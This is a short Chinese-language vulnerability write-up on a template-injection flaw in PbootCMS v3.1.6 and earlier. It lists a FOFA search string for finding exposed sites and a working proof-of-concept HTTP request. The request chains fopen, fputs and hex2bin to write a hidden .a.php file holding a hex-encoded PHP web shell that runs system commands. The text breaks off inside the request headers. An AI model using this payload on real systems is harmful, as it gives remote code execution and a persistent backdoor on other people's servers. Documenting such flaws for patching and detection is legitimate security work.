0x01 產品簡介

PbootCMS是全新內核且永久開源免費的PHP企業網站開發建設管理系統，是一套高效、簡潔、 強悍的可免費商用的PHP CMS源碼，能夠滿足各類企業網站開發建設的需要

0x02 漏洞概述

PbootCMS v<=3.1.6版本中存在模板注入，攻擊者可構造特定的鏈接利用該漏洞，執行任意代碼，寫入后門，獲取服務器權限，進而控制整個web服務器。

0x03 復現環境

FOFA：app="PbootCMS-PHP網站開發管理系統"

0x04 漏洞復現

PoC-1

GET /?member/login/aaaaaa}{pboot:if(true);use/**/function/**/fputs/**/as/**/test;use/**/function/**/fopen/**/as/**/test1;use/**/function/**/get/**/as/**/test3;use/**/function/**/hex2bin/**/as/**/test4;test(test1(test3('file'),'w'),test4(test3('content')));if(true)}{/pboot:if}&file=.a.php&content=3c3f7068702073797374656d28245f524551554553545b2761275d293b3f3e HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh;